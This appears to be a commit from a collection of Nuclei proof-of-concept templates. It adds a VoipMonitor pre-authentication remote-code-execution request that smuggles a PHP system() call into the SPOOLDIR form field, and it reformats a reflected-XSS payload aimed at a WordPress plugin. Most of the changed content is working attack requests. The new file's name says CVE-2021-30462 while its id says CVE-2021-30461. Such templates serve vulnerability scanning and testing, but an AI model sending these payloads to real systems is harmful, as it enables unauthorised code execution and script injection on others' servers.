20241014

adysec · Oct 14, 2024 · a1315f3 · a1315f3
1 parent 72b4593
commit a1315f3
Show file tree

Hide file tree

Showing 4 changed files with 45 additions and 1 deletion.
diff --git a/date.txt b/date.txt
@@ -1 +1 @@
-20241013
+20241014
diff --git a/poc.txt b/poc.txt
@@ -50399,6 +50399,7 @@
 ./poc/cve/cve-2021-30461-6056.yaml
 ./poc/cve/cve-2021-30461-6057.yaml
 ./poc/cve/cve-2021-30461.yaml
+./poc/cve/cve-2021-30462.yaml
 ./poc/cve/cve-2021-30497-6058.yaml
 ./poc/cve/cve-2021-30497-6059.yaml
 ./poc/cve/cve-2021-30497-6060.yaml

diff --git a/poc/cve/cve-2015-2807-2498.yaml b/poc/cve/cve-2015-2807-2498.yaml
@@ -1,4 +1,5 @@
 id: CVE-2015-2807
+
 info:
   name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
   author: daffainfo
@@ -8,20 +9,24 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2015-2807
   tags: cve,cve2015,wordpress,wp-plugin,xss
   description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter."
+
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - '</script><script>alert(document.domain)</script>'
         part: body
+
       - type: word
         part: header
         words:
           - text/html
+
       - type: status
         status:
           - 200
diff --git a/poc/cve/cve-2021-30462.yaml b/poc/cve/cve-2021-30462.yaml
@@ -0,0 +1,38 @@
+id: CVE-2021-30461
+
+info:
+  name: VoipMonitor Pre-Auth-RCE
+  author: nithissh
+  severity: critical
+  description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
+  tags: cve,cve2021,rce,voipmonitor
+  reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
+
+requests:
+  - raw:
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 35
+
+        SPOOLDIR=test".system(id)."&recheck=Recheck
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "uid="
+          - "gid="
+          - "groups="
+          - "VoIPmonitor installation"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200